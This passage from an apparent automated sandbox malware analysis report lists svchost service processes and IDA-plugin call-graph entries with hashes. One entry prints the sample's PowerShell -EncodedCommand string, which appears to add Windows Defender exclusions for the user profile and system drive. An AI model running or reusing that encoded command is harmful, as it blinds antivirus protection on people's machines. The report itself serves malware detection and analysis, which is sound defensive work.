                                              Commandline:C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                                              Imagebase:0x7ff6eef20000
                                              File size:55'320 bytes
                                              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Has exited:false

                                              Target ID:30
                                              Start time:07:41:17
                                              Start date:04/06/2024
                                              Path:C:\Windows\System32\svchost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
                                              Imagebase:0x7ff6eef20000
                                              File size:55'320 bytes
                                              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Has exited:false

                                              Target ID:31
                                              Start time:07:41:18
                                              Start date:04/06/2024
                                              Path:C:\Windows\System32\svchost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
                                              Imagebase:0x7ff6eef20000
                                              File size:55'320 bytes
                                              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Has exited:false

                                              Target ID:32
                                              Start time:07:41:18
                                              Start date:04/06/2024
                                              Path:C:\Windows\System32\svchost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
                                              Imagebase:0x7ff6eef20000
                                              File size:55'320 bytes
                                              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Has exited:false

                                              Target ID:34
                                              Start time:07:41:19
                                              Start date:04/06/2024
                                              Path:C:\Windows\System32\svchost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
                                              Imagebase:0x7ff6eef20000
                                              File size:55'320 bytes
                                              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                              Has elevated privileges:true
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Has exited:false

                                              Target ID:35
                                              Start time:07:41:21
                                              Start date:04/06/2024
                                              Path:C:\Windows\System32\svchost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
                                              Imagebase:0x7ff6eef20000
                                              File size:55'320 bytes
                                              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Has exited:false

                                              Target ID:36
                                              Start time:07:41:22
                                              Start date:04/06/2024
                                              Path:C:\Windows\System32\svchost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
                                              Imagebase:0x7ff6eef20000
                                              File size:55'320 bytes
                                              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                              Has elevated privileges:true
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Has exited:false

                                              Target ID:37
                                              Start time:07:41:22
                                              Start date:04/06/2024
                                              Path:C:\Windows\System32\svchost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
                                              Imagebase:0x7ff6eef20000
                                              File size:55'320 bytes
                                              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Has exited:false

                                              Target ID:38
                                              Start time:07:41:23
                                              Start date:04/06/2024
                                              Path:C:\Windows\System32\svchost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
                                              Imagebase:0x7ff6eef20000
                                              File size:55'320 bytes
                                              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                              Has elevated privileges:true
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Has exited:false

                                              Target ID:39
                                              Start time:07:41:24
                                              Start date:04/06/2024
                                              Path:C:\Windows\System32\svchost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
                                              Imagebase:0x7ff6eef20000
                                              File size:55'320 bytes
                                              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                              Has elevated privileges:true
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Has exited:false

                                              Target ID:40
                                              Start time:07:41:24
                                              Start date:04/06/2024
                                              Path:C:\Windows\System32\svchost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
                                              Imagebase:0x7ff6eef20000
                                              File size:55'320 bytes
                                              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Has exited:false

                                              Target ID:41
                                              Start time:07:41:24
                                              Start date:04/06/2024
                                              Path:C:\Windows\System32\svchost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
                                              Imagebase:0x7ff6eef20000
                                              File size:55'320 bytes
                                              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Has exited:false

                                              Target ID:42
                                              Start time:07:41:25
                                              Start date:04/06/2024
                                              Path:C:\Windows\System32\svchost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\svchost.exe -k LocalService -p -s FontCache
                                              Imagebase:0x7ff6eef20000
                                              File size:55'320 bytes
                                              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                              Has elevated privileges:true
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Has exited:false

                                              Target ID:44
                                              Start time:07:41:26
                                              Start date:04/06/2024
                                              Path:C:\Windows\System32\svchost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
                                              Imagebase:0x7ff6eef20000
                                              File size:55'320 bytes
                                              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                              Has elevated privileges:true
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Has exited:false

                                              Target ID:46
                                              Start time:07:41:26
                                              Start date:04/06/2024
                                              Path:C:\Windows\System32\svchost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
                                              Imagebase:0x7ff6eef20000
                                              File size:55'320 bytes
                                              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                              Has elevated privileges:true
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Has exited:false

                                              Target ID:47
                                              Start time:07:41:26
                                              Start date:04/06/2024
                                              Path:C:\Windows\System32\svchost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
                                              Imagebase:0x7ff6eef20000
                                              File size:55'320 bytes
                                              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                              Has elevated privileges:true
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Has exited:false

                                              Target ID:48
                                              Start time:07:41:26
                                              Start date:04/06/2024
                                              Path:C:\Windows\System32\svchost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                              Imagebase:0x7ff6eef20000
                                              File size:55'320 bytes
                                              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                              Has elevated privileges:true
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Has exited:false

                                              Target ID:49
                                              Start time:07:41:27
                                              Start date:04/06/2024
                                              Path:C:\Windows\System32\svchost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
                                              Imagebase:0x7ff6eef20000
                                              File size:55'320 bytes
                                              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Has exited:false

                                              Target ID:50
                                              Start time:07:41:27
                                              Start date:04/06/2024
                                              Path:C:\Windows\System32\svchost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                              Imagebase:0x7ff6eef20000
                                              File size:55'320 bytes
                                              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                              Has elevated privileges:true
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Has exited:false

                                              Reset < >

                                                Execution Graph

                                                Execution Coverage:58.9%
                                                Dynamic/Decrypted Code Coverage:0%
                                                Signature Coverage:20%
                                                Total number of Nodes:10
                                                Total number of Limit Nodes:0

                                                Callgraph

                                                Control-flow Graph

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1659628865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1659540497.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1659645833.0000000000402000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1659666562.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                Similarity
                                                • API ID: ExceptionFilterUnhandled__getmainargs__set_app_type_controlfpexitmemset
                                                • String ID:
                                                • API String ID: 3649950142-0
                                                • Opcode ID: 3c7f208ab86616cf9a1686d6869a33b986d176603efbc1ea6a58cd6fd1d05e61
                                                • Instruction ID: fc045321f811a098a7979d314287de060eedcd0c545a428eb1da9c6cbbdaf0c5
                                                • Opcode Fuzzy Hash: 3c7f208ab86616cf9a1686d6869a33b986d176603efbc1ea6a58cd6fd1d05e61
                                                • Instruction Fuzzy Hash: FE11FAF5E00104ABDB40EBA8ED85F5A77ACAB08318F10407AF805F73A1E67CE9448769

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 3 401000-401039 ShellExecuteA
                                                APIs
                                                • ShellExecuteA.SHELL32(open,open,powershell,-EncodedCommand "PAAjAGwAaQBmACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAcABsAHMAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAawBpAGQAIwA,?,?), ref: 0040102E
                                                Strings
                                                • powershell, xrefs: 0040101C, 00401021
                                                • open, xrefs: 00401022, 00401027, 0040102D
                                                • -EncodedCommand "PAAjAGwAaQBmACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAcABsAHMAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAawBpAGQAIwA, xrefs: 00401016, 0040101B
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1659628865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1659540497.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1659645833.0000000000402000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1659666562.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                Similarity
                                                • API ID: ExecuteShell
                                                • String ID: -EncodedCommand "PAAjAGwAaQBmACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAcABsAHMAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAawBpAGQAIwA$open$powershell
                                                • API String ID: 587946157-2345915519
                                                • Opcode ID: 73fb1aa1647e4e3e08cdd17ebb0cf718c89274690c8596046e7b3d86a62e50f3
                                                • Instruction ID: 465bb01503e637d60117158f12c64ae71dfa9f42f6fb030d0b5228a9f9c9fdb5
                                                • Opcode Fuzzy Hash: 73fb1aa1647e4e3e08cdd17ebb0cf718c89274690c8596046e7b3d86a62e50f3
                                                • Instruction Fuzzy Hash: 29D0EAA07002042BE7A0A16D9E4AF03248D8349348F6044763648F33D1E5ACEC1882BD

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 4 4010e3-401136 call 40103c call 401000 call 401098
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1659628865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1659540497.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1659645833.0000000000402000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1659666562.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                Similarity
                                                • API ID: ExecuteShell
                                                • String ID:
                                                • API String ID: 587946157-0
                                                • Opcode ID: 3b9c1e2987f2b999ad0d0f9c8693af35fb68528fd67076efd52a34421309947a
                                                • Instruction ID: 49e43100846b01024c59343c30e83f1d4a14909fbe362eb7700aa3e60a8dc1a4
                                                • Opcode Fuzzy Hash: 3b9c1e2987f2b999ad0d0f9c8693af35fb68528fd67076efd52a34421309947a
                                                • Instruction Fuzzy Hash: A8F0FEB4A00249AFCB40DFA8D985E4A77F8AB49308F004075F844E7350D634E9448B54
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1726394283.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_c00000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 598cc4b2efc7e08defd23d38710dac73e66c988d12dcebc45a9e967a8dfd6580
                                                • Instruction ID: 7a89eeae038f2f8f76e7adf4f1e400f2397b396d1e7e9109e1cd1d44c420d5eb
                                                • Opcode Fuzzy Hash: 598cc4b2efc7e08defd23d38710dac73e66c988d12dcebc45a9e967a8dfd6580
                                                • Instruction Fuzzy Hash: A3915FB1F006159BDB19DFB589116AEBBF7EF84700B00892EE506AB394DF345E058BC5
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1726394283.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_c00000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 8f745523b6d86179a527a0eb8312426372bb86a63f6b3c553f57de80afb70347
                                                • Instruction ID: 394c0788df87e172323f6fff632ab147c12ad2bc63494e110916848dc486ea92
                                                • Opcode Fuzzy Hash: 8f745523b6d86179a527a0eb8312426372bb86a63f6b3c553f57de80afb70347
                                                • Instruction Fuzzy Hash: BD915EB1F006159BDB19DFB58A116AEB7F7EF84700B00892EE506AB394DF349E058BC5
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1735195011.0000000006F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F50000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_6f50000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 4'fq$4'fq$4'fq$4'fq
                                                • API String ID: 0-359900465
                                                • Opcode ID: 9fab19da6fb32123986de7d695557e1a82d9a65bdfe7847e6c76ae78a939ba61
                                                • Instruction ID: d03caebfd1a4c2d5ae40d21f41a1819746af5e6b5c0fbb63083900e193c86b3b
                                                • Opcode Fuzzy Hash: 9fab19da6fb32123986de7d695557e1a82d9a65bdfe7847e6c76ae78a939ba61
                                                • Instruction Fuzzy Hash: 82F12732F042149FCB959BBC841176BBBE29F95350F16846ADA05CB652EF31CC86C7E2
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1735195011.0000000006F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F50000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_6f50000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: $fq$$fq$$fq
                                                • API String ID: 0-837900676
                                                • Opcode ID: a3102c643f146013e00004453f981f3590c8f0c3e9ad09c9ae8447bb88fd4e21
                                                • Instruction ID: 75d47a6df230c29aa8b23b5bf73e4e3f25112ff4ac32d6eb191f8105ae63dcf2
                                                • Opcode Fuzzy Hash: a3102c643f146013e00004453f981f3590c8f0c3e9ad09c9ae8447bb88fd4e21
                                                • Instruction Fuzzy Hash: 2F51E632F102059FDF549AB8C41576EB7D2AF84310F558429EE21DB2A6DF32CD41C7A1
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1735195011.0000000006F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F50000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_6f50000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 4'fq$4'fq
                                                • API String ID: 0-751858264
                                                • Opcode ID: 368b2840d772e9fbaab37419115ea2a774f399ed3656c25e687565e90e0fd2e0
                                                • Instruction ID: 05f7ed919632831e3cd0c378fc9df3f7eaed1e8af5f985e4f8c9492dd4918213
                                                • Opcode Fuzzy Hash: 368b2840d772e9fbaab37419115ea2a774f399ed3656c25e687565e90e0fd2e0
                                                • Instruction Fuzzy Hash: F6F12771F00205DFDB948BB8C84176ABBE6AF89310F16817AEE05DB651DB31DE41C7A2
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1735195011.0000000006F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F50000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_6f50000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: $fq$$fq
                                                • API String ID: 0-2537786760
                                                • Opcode ID: 64bae4c04240b7c6b8c5c2cbeabb5a72befc2e7398048b20f9e8f10dbd7b0869
                                                • Instruction ID: bd354c0c135ea6ee0a5c9e57acdef7dc7025ce8650c3435b974063b4cb06ba00
                                                • Opcode Fuzzy Hash: 64bae4c04240b7c6b8c5c2cbeabb5a72befc2e7398048b20f9e8f10dbd7b0869
                                                • Instruction Fuzzy Hash: B641D732E043409FDF659F64C52576A7BA1AF41201F8A446ADE21DB2B7DF35CD40C7A2
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1726394283.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_c00000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: (jq
                                                • API String ID: 0-3225323518
                                                • Opcode ID: 6eea020df6173c19af0df4e009e5bf5729334fee17ffbf4e9835072e17f3a90b
                                                • Instruction ID: 025e6fb6818ac807e4c9911fc7b180b79af6c966e3668b47fa85d05212aaa0c7
                                                • Opcode Fuzzy Hash: 6eea020df6173c19af0df4e009e5bf5729334fee17ffbf4e9835072e17f3a90b
                                                • Instruction Fuzzy Hash: 34412C74B082048FDB19DF68C858AADBBF2EF8D710F1445A9D916AB3D1DA35ED01CB60
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1726394283.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_c00000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: (&fq
                                                • API String ID: 0-1822945044
                                                • Opcode ID: aac7ac4fefb3918568de4ca80040a4d607c6516342490dcbe945bc72fafc0b7c
                                                • Instruction ID: c051b9621ef86572236a3fa043273e22320022a6d40a2bf7df3d5438494ddea2
                                                • Opcode Fuzzy Hash: aac7ac4fefb3918568de4ca80040a4d607c6516342490dcbe945bc72fafc0b7c
                                                • Instruction Fuzzy Hash: 9F2181B5A042588FCB14DFAED44479EBBF5AF88320F14846AD419E7380CB759D05CBA5
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1735195011.0000000006F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F50000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_6f50000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: $fq
                                                • API String ID: 0-12477121
                                                • Opcode ID: 3c6677bdaa3f1bd5ff494570fa64a5835880a1df4c8e8a3e6a69fec223633671
                                                • Instruction ID: 12a454d27760c69ec368cf58ea363426873d82e01ca781f792e5bd7c19f05ed4
                                                • Opcode Fuzzy Hash: 3c6677bdaa3f1bd5ff494570fa64a5835880a1df4c8e8a3e6a69fec223633671
                                                • Instruction Fuzzy Hash: DE01D436B50204DFDF589B68D810AAEBBA2EF88300F558115ED15DB266CF32DC01CBE6
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1726394283.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_c00000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 79e164efa7e0178d14eb47057e488d390080996b3e19a04d8326dbbc26ee4dea
                                                • Instruction ID: 063474ca151849ae1d25bb56a6643f303fc69babf984ad1a386890f2be718745
                                                • Opcode Fuzzy Hash: 79e164efa7e0178d14eb47057e488d390080996b3e19a04d8326dbbc26ee4dea
                                                • Instruction Fuzzy Hash: 48B1A170A052859FC716CF68C4989AEBFB1FF4A310B298196C455DB3A2C735EC56CBA0
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1726394283.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_c00000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: dccf899e3b37069bbd672cea0f77b622556167a521ed4112c31b32f32f86c0d8
                                                • Instruction ID: f7486143cd1eb6b999c548646a8b945de374e3cf09e8510a36d1fd576bd52ebf
                                                • Opcode Fuzzy Hash: dccf899e3b37069bbd672cea0f77b622556167a521ed4112c31b32f32f86c0d8
                                                • Instruction Fuzzy Hash: 50516EB4B002098FDB14DFACD59496ABBE6AF98300B1488A9E569CF351DB34ED01DB91
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1726394283.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_c00000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a528d7098384db64111ffaff6fd784daf4fb4a8c03911fd70fcd014f7b6d0b10
                                                • Instruction ID: 67aec65d31ef00ee8531e449ad2522cf7383b95e75b3b6098221b121738ff6a0
                                                • Opcode Fuzzy Hash: a528d7098384db64111ffaff6fd784daf4fb4a8c03911fd70fcd014f7b6d0b10
                                                • Instruction Fuzzy Hash: 3551D174B082059FD7089B79D858A6A77EAFFC8310F158669E509CB391DB35EC01CB90
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1726394283.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_c00000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: dac63232eba2c3453f6f1a10d6a020a10cddd9be39f38730fe3b11d74cb12b63
                                                • Instruction ID: 5c32e2a3cfdaee4afe241d19e4507927f7b1e45988ea07140d21948c8d9d4178
                                                • Opcode Fuzzy Hash: dac63232eba2c3453f6f1a10d6a020a10cddd9be39f38730fe3b11d74cb12b63
                                                • Instruction Fuzzy Hash: 2361F3B1E00248DFDB14DFA9D584B9DFBF1EF88314F24816AE819AB294DB34AD45CB50
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1726394283.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_c00000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 1c0a78c083667ecb0e63da0a60f92f529901999f758393523bc133a27e7cd86b
                                                • Instruction ID: 613d1af4ed6265af23dc77ebd4bc2e5bee15634597c14d8b3cc696a0b7363924
                                                • Opcode Fuzzy Hash: 1c0a78c083667ecb0e63da0a60f92f529901999f758393523bc133a27e7cd86b
                                                • Instruction Fuzzy Hash: 6F5112B1E002489FDB14DFA9D584B9DFBF2EF88310F24806AE819AB395DB349D45CB50
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1726394283.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_c00000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 30d7da8ad69aaec2d4e1c5961492d461a7a47574edb22681cc42947badf6000c
                                                • Instruction ID: 28dfd5001e73b8bbf3fb600e252606fc1099e297e84b67ad7ea6f16f6beac54b
                                                • Opcode Fuzzy Hash: 30d7da8ad69aaec2d4e1c5961492d461a7a47574edb22681cc42947badf6000c
                                                • Instruction Fuzzy Hash: EE418DB47002098FDB10DF6CD59892ABBE6EF9930071488A9E559CF391EB35ED01CB91
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1726394283.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_c00000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: fb6bf112b29e05b535dc32a5efb6fb272b18dc1d55f7ed50b5eb162b2cdc77a7
                                                • Instruction ID: a38d5b8fbe86796b17e68fbfcd6ff2b14835fe8fd8563a6f5a69c50b533b9b6a
                                                • Opcode Fuzzy Hash: fb6bf112b29e05b535dc32a5efb6fb272b18dc1d55f7ed50b5eb162b2cdc77a7
                                                • Instruction Fuzzy Hash: A0413BB47002098FDB14DF6CC59892ABBE6EF98304B1488A9E559CF351EB34ED01DB91
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1735195011.0000000006F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F50000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_6f50000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 6c279f32bde50e1f3392077cc24e5e8b43b088386783cc0a3b7fd121de40feeb
                                                • Instruction ID: b8166d790823dfc82368328e958e817fa6a6aea28d0f15487ff883c4bdea854d
                                                • Opcode Fuzzy Hash: 6c279f32bde50e1f3392077cc24e5e8b43b088386783cc0a3b7fd121de40feeb
                                                • Instruction Fuzzy Hash: DF41E633E013059FCBA59B6C841166ABBF3AF85280F164096EE018F252EB35DD49C7A2
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1726394283.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_c00000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 616fa929756d73bef75796cb9cc072529e5f161550d069c49b2d7681e0a0f796
                                                • Instruction ID: 0f46e8cd9e85d9a84bc2503b1263c17465b1205cb3620b0dbd159a2bba49bff3
                                                • Opcode Fuzzy Hash: 616fa929756d73bef75796cb9cc072529e5f161550d069c49b2d7681e0a0f796
                                                • Instruction Fuzzy Hash: DD413A74A00505DFDB05CF59C498AAEFBB1FF48310B158159D915AB3A4C732FD92CB90
                                                Memory Dump Source
